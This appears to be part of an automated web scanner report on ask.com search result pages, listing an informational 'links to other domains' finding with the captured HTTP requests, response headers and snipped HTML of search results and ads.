http://www.reuseit.com/
http://www.thedailygreen.com/green-homes/eco-friendly/lead-in-reusable-shopping-bags-461110

Request

GET /web?q=Is+there+lead+in+reusable+grocery+bags%3F&gc=1&qsrc=3066&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:13:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: gcc=U2hvcHBpbmcvQXJ0c19hbmRfRW50ZXJ0YWlubWVudC9BcnRzX2FuZF9DcmFmdHNfU3VwcGxpZXM.; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:13:46 GMT; Path=/
Set-Cookie: clc=U2hvcHBpbmcvQXJ0c19hbmRfRW50ZXJ0YWlubWVudC9BcnRzX2FuZF9DcmFmdHNfU3VwcGxpZXM.; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:13:46 GMT; Path=/
Set-Cookie: ldst=sorg=-1|1296155626342; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:46 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:46 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-SXMrdGhlcmUrbGVhZCtpbityZXVzYWJsZStncm9jZXJ5K2JhZ3MlM0Y.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjQ2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:46 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:46 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:46 GMT; Path=/
Content-Length: 122242

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=Is+there+lead+in+reusable+grocery+bags%3F"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<span><a class="title txt3" href="http://www.nydailynews.com/ny_local/2010/11/15/2010-11-15_reusable_grocery_bags_made_in_china_found_to_contain_lead_fueling_calls_for_fda_.html" onmousedown="return pk(this,{en:'da',io:'1',b:'a001',tp:'31',ec:'4',ex:'da_sn%3D00090%26da_lhs%3D1928506%26da_lhx%3DDA%253A%2BLifestyles%26da_rhs%3D1928569%26da_rht%3DLink%26da_rhx%3DNY%2BDaily%2BNews%26da_sro%3D1928563%26da_stp%3D1%26da_iid%3D0001%26da_lit%3DIs%2Bthere%2Blead%2Bin%2Breusable%2Bgrocery%2Bbags'});" target="_blank" >NY Daily News</a>
...[SNIP]...
<span><a class="title txt3" href="http://www.nytimes.com/2010/11/15/nyregion/15bags.html" onmousedown="return pk(this,{en:'da',io:'2',b:'a001',tp:'31',ec:'4',ex:'da_sn%3D00090%26da_lhs%3D1928506%26da_lhx%3DDA%253A%2BLifestyles%26da_rhs%3D1962856%26da_rht%3DLink%26da_rhx%3DNYTimes.com%26da_sro%3D1928563%26da_stp%3D1%26da_iid%3D0001%26da_lit%3DIs%2Bthere%2Blead%2Bin%2Breusable%2Bgrocery%2Bbags'});" target="_blank" >NYTimes.com</a>
...[SNIP]...
<span><a class="title txt3" href="http://www.thedailygreen.com/green-homes/eco-friendly/lead-in-reusable-shopping-bags-461110" onmousedown="return pk(this,{en:'da',io:'3',b:'a001',tp:'31',ec:'4',ex:'da_sn%3D00090%26da_lhs%3D1928506%26da_lhx%3DDA%253A%2BLifestyles%26da_rhs%3D1962864%26da_rht%3DLink%26da_rhx%3DThe%2BDaily%2BGreen%26da_sro%3D1928563%26da_stp%3D1%26da_iid%3D0001%26da_lit%3DIs%2Bthere%2Blead%2Bin%2Breusable%2Bgrocery%2Bbags'});" target="_blank" >The Daily Green</a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="r_t1"><a onmousedown="return pk(this,{en:'af',io:'0',b:'a002',tp:'d',ec:'1'})" href="http://abcnews.go.com/Business/wireStory?id=12143990" class="title txt_lg" >Probe of <b>
...[SNIP]...

<a onmousedown="return pk(this,{en:'ni',io:'0',b:'a003',tp:'d',ec:'6'})" href="http://c.moreover.com/click/here.pl?z3976099917&amp;z=1250248829" onmouseover="return ss('http://content.usatoday.com/communities/greenhouse/post/2011/01/buying-lead-free-reusable-shopping-bags/1?csp=34')" onmouseout="cs()" >

<img src="http://66.235.120.67:80/e?t=4583401241928196370" alt="" border="0" height="50" style="border:solid 1px #ccc">

</a>
...[SNIP]...
<div class="T3" style="text-align:center">
<a class="L3" onmousedown="return pk(this,{en:'ni',io:'0',b:'a003',tp:'d',ec:'6'})" href="http://c.moreover.com/click/here.pl?z3976099917&amp;z=1250248829" onmouseover="return ss('http://content.usatoday.com/communities/greenhouse/post/2011/01/buying-lead-free-reusable-shopping-bags/1?csp=34')" onmouseout="cs()" >Source</a>
...[SNIP]...
<div class="pl10">

<a class="txt3 title" onmousedown="return pk(this,{en:'ns',io:'0',b:'a003',tp:'d',ec:'6'})" href="http://c.moreover.com/click/here.pl?z3976099917&amp;z=1250248829" onmouseover="return ss('http://content.usatoday.com/communities/greenhouse/post/2011/01/buying-lead-free-reusable-shopping-bags/1?csp=34')" onmouseout="cs()" >How to buy <b>
...[SNIP]...
<div class="pl10">

<a class="title txt3" onmousedown="return pk(this,{en:'ns',io:'1',b:'a003',tp:'d',ec:'6'})" href="http://c.moreover.com/click/here.pl?z3983155500&amp;z=1250248829" onmouseover="return ss('http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2011/01/25/MN471HDLGM.DTL&tsp=1')" onmouseout="cs()" >Paper? Plastic? <b>
...[SNIP]...
<div class="pl10">

<a class="title txt3" onmousedown="return pk(this,{en:'ns',io:'2',b:'a003',tp:'d',ec:'6'})" href="http://c.moreover.com/click/here.pl?z3983099646&amp;z=1250248841" onmouseover="return ss('http://feeds.sfgate.com/click.phdo?i=afcddb3a99db5952185055c6728459e0')" onmouseout="cs()" >Studies find <b>
...[SNIP]...
<td>

<a id="r3_t" href="http://www.msnbc.msn.com/id/40139816/ns/us_news-environment/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a004',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" >Newspaper finds <b>
...[SNIP]...
<td>

<a id="r4_t" href="http://www.nytimes.com/2010/11/15/nyregion/15bags.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" >Even <b>
...[SNIP]...
<td>

<a id="r5_t" href="http://www.reuseit.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dvnru'},'false',0)" class="title txt_lg" target="_blank" >Reusables for every part of your life - Reuseit.com</a>
...[SNIP]...
<td>

<a id="r6_t" href="http://spiderx.wordpress.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<div id="r_t6"><a onmousedown="return pk(this,{en:'af',io:'0',b:'a008',tp:'d',ec:'1'})" href="http://www.digtriad.com/news/local_state/article.aspx?storyid=150621" class="title txt_lg" >Do <b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.green-kits.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r9_t" href="http://www.ityse.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >iTySE > Home</a>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=;u4=;u3=;u2=0;ord=-1351412874?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.24. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?q=regulator+boat&qsrc=0&frstpgo=0&o=0&l=dir&qid=98661B091CD7946B37C24EBBC344D14A&page=2&jss=

The response contains the following links to other domains:

http://4.afs.googleadservices.com/images/partners/CLPGxeuS26YCFd9H5godOnkY8A/aj-cat.png
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=regulator+boat
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://marinesource.com/builders/regulator/search.html
http://www.askkids.com/?o=0&l=dir
http://www.boatoregon.com/
http://www.boatpartsinfo.com/
http://www.boatquest.com/Regulator/1/allmanufacturerboats.aspx
http://www.boatquest.com/Regulator/26/Morehead-City/1/size_manufacturerCityNameBoats.aspx
http://www.boatsafe.com/
http://www.boattest.com/
http://www.boattrader.com/browse/make/regulator
http://www.classicboat.co.uk/
http://www.google.com/aclk?sa=L&ai=CeqUSG8tBTfPMMt-PmQe68uGAD4mdlFO5_fqgA8XU-SsQBSD7_oEDKAVQhYnL5gJgyYajh9SjgBCQAQLIAQGqBBlP0MmJlxu9jPAHXXHe58zHz9gMUrHg0HFg&num=5&sig=AGiWqtwuMyE62WG_PdXdH1Pq4dKoZVFpng&adurl=http://www.sailorman.com/used_gear.php
http://www.google.com/aclk?sa=L&ai=CtFKvG8tBTfPMMt-PmQe68uGAD4WC_sYBtYbU7gm9qYcHEAQg-_6BAygFUILDy_j-_____wFgyYajh9SjgBCQAQLIAQGqBBtP0Pn7gxu8hPC_XvAF5XUaoHgHk88zSh6Quvw&num=4&sig=AGiWqtypoc8X3Zt7IHIwIEDBqwl71RkLGA&adurl=http://www.pressure-controls.com
http://www.google.com/aclk?sa=l&ai=CsYRRG8tBTfPMMt-PmQe68uGAD5yQkeEBpIyLrBTc66IsEAMg-_6BAygFUKuO7fEFYMmGo4fUo4AQkAECoAGA6M38A8gBAaoEGU_QubCBG7uM8Addcd7nzMfP2AxSseDQcWA&num=3&sig=AGiWqtwjOou5bPGjkRcI55a9vOnbi23Z3Q&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404
http://www.google.com/aclk?sa=l&ai=CzEfvG8tBTfPMMt-PmQe68uGAD-2R_78Br7bGshWQqMEHEAIg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCQAQKgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Q6cu1G7qM8Addcc_mA-gcutHuq1I_DHQGjvEQsuI&num=2&sig=AGiWqtz-pYPd2YOBvUM8InC1guSltW8eSg&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/
http://www.google.com/aclk?sa=l&ai=CzzOGG8tBTfPMMt-PmQe68uGAD9vO8tsBk7izyxfr17kIEAEg-_6BAygFUIfc5pcHYMmGo4fUo4AQkAECoAG50r__A8gBAaoEHE_Qqd-KG7mM8E9d77F0rcDDxtbitYiPCBxZ940&num=1&sig=AGiWqtxhYYXQ7Wq6ukoslZ5MN-RmtC8S-Q&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts
http://www.oysterharborsregulator.com/

Request

GET /web?q=regulator+boat&qsrc=0&frstpgo=0&o=0&l=dir&qid=98661B091CD7946B37C24EBBC344D14A&page=2&jss= HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:27 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjI3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:27 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:27 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 122735

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=regulator+boat"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...

<img src="http://4.afs.googleadservices.com/images/partners/CLPGxeuS26YCFd9H5godOnkY8A/aj-cat.png" style="display:none;" height="1px" width="1px" alt=""/>

<span class="T7 fr tp info txt0">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CzzOGG8tBTfPMMt-PmQe68uGAD9vO8tsBk7izyxfr17kIEAEg-_6BAygFUIfc5pcHYMmGo4fUo4AQkAECoAG50r__A8gBAaoEHE_Qqd-KG7mM8E9d77F0rcDDxtbitYiPCBxZ940&num=1&sig=AGiWqtxhYYXQ7Wq6ukoslZ5MN-RmtC8S-Q&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(52); if (typeof efclk != 'undefined') efclk(52); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_0');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CzzOGG8tBTfPMMt-PmQe68uGAD9vO8tsBk7izyxfr17kIEAEg-_6BAygFUIfc5pcHYMmGo4fUo4AQkAECoAG50r__A8gBAaoEHE_Qqd-KG7mM8E9d77F0rcDDxtbitYiPCBxZ940&num=1&sig=AGiWqtxhYYXQ7Wq6ukoslZ5MN-RmtC8S-Q&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(52); if (typeof efclk != 'undefined') efclk(52); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_0');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CzEfvG8tBTfPMMt-PmQe68uGAD-2R_78Br7bGshWQqMEHEAIg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCQAQKgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Q6cu1G7qM8Addcc_mA-gcutHuq1I_DHQGjvEQsuI&num=2&sig=AGiWqtz-pYPd2YOBvUM8InC1guSltW8eSg&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(82); if (typeof efclk != 'undefined') efclk(82); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_1');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CzEfvG8tBTfPMMt-PmQe68uGAD-2R_78Br7bGshWQqMEHEAIg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCQAQKgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Q6cu1G7qM8Addcc_mA-gcutHuq1I_DHQGjvEQsuI&num=2&sig=AGiWqtz-pYPd2YOBvUM8InC1guSltW8eSg&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(82); if (typeof efclk != 'undefined') efclk(82); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_1');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CsYRRG8tBTfPMMt-PmQe68uGAD5yQkeEBpIyLrBTc66IsEAMg-_6BAygFUKuO7fEFYMmGo4fUo4AQkAECoAGA6M38A8gBAaoEGU_QubCBG7uM8Addcd7nzMfP2AxSseDQcWA&num=3&sig=AGiWqtwjOou5bPGjkRcI55a9vOnbi23Z3Q&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(45); if (typeof efclk != 'undefined') efclk(45); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_2');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CsYRRG8tBTfPMMt-PmQe68uGAD5yQkeEBpIyLrBTc66IsEAMg-_6BAygFUKuO7fEFYMmGo4fUo4AQkAECoAGA6M38A8gBAaoEGU_QubCBG7uM8Addcd7nzMfP2AxSseDQcWA&num=3&sig=AGiWqtwjOou5bPGjkRcI55a9vOnbi23Z3Q&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(45); if (typeof efclk != 'undefined') efclk(45); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_2');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CtFKvG8tBTfPMMt-PmQe68uGAD4WC_sYBtYbU7gm9qYcHEAQg-_6BAygFUILDy_j-_____wFgyYajh9SjgBCQAQLIAQGqBBtP0Pn7gxu8hPC_XvAF5XUaoHgHk88zSh6Quvw&num=4&sig=AGiWqtypoc8X3Zt7IHIwIEDBqwl71RkLGA&adurl=http://www.pressure-controls.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(54); if (typeof efclk != 'undefined') efclk(54); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_3');" class="nu" onmouseover="return ss('www.pressure-controls.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CtFKvG8tBTfPMMt-PmQe68uGAD4WC_sYBtYbU7gm9qYcHEAQg-_6BAygFUILDy_j-_____wFgyYajh9SjgBCQAQLIAQGqBBtP0Pn7gxu8hPC_XvAF5XUaoHgHk88zSh6Quvw&num=4&sig=AGiWqtypoc8X3Zt7IHIwIEDBqwl71RkLGA&adurl=http://www.pressure-controls.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(54); if (typeof efclk != 'undefined') efclk(54); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'4',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_3');" class="nu" onmouseover="return ss('www.pressure-controls.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<td>

<a id="r0_t" href="http://www.oysterharborsregulator.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a001',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" >Oyster Harbors <b>
...[SNIP]...
<td>

<a id="r1_t" href="http://marinesource.com/builders/regulator/search.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a002',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r2_t" href="http://www.boattrader.com/browse/make/regulator"
onmousedown="return fp(this,{en:'te',io:'0',b:'a003',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r3_t" href="http://www.boatquest.com/Regulator/1/allmanufacturerboats.aspx"
onmousedown="return fp(this,{en:'te',io:'0',b:'a004',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r4_t" href="http://www.boatquest.com/Regulator/26/Morehead-City/1/size_manufacturerCityNameBoats.aspx"
onmousedown="return fp(this,{en:'in',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >26 ft. <b>
...[SNIP]...
<td>

<a id="r5_t" href="http://www.boatsafe.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >BoatSafe.com - <b>
...[SNIP]...
<td>

<a id="r6_t" href="http://www.boattest.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r7_t" href="http://www.classicboat.co.uk/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >Home | Classic <b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.boatpartsinfo.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >News and Information on <b>
...[SNIP]...
<td>

<a id="r9_t" href="http://www.boatoregon.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dtxtx'},'false',0)" class="title txt_lg" target="_blank" >State of Oregon: Oregon State Marine Board</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CzzOGG8tBTfPMMt-PmQe68uGAD9vO8tsBk7izyxfr17kIEAEg-_6BAygFUIfc5pcHYMmGo4fUo4AQkAECoAG50r__A8gBAaoEHE_Qqd-KG7mM8E9d77F0rcDDxtbitYiPCBxZ940&num=1&sig=AGiWqtxhYYXQ7Wq6ukoslZ5MN-RmtC8S-Q&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(15); if (typeof efclk != 'undefined') efclk(15); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_0');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
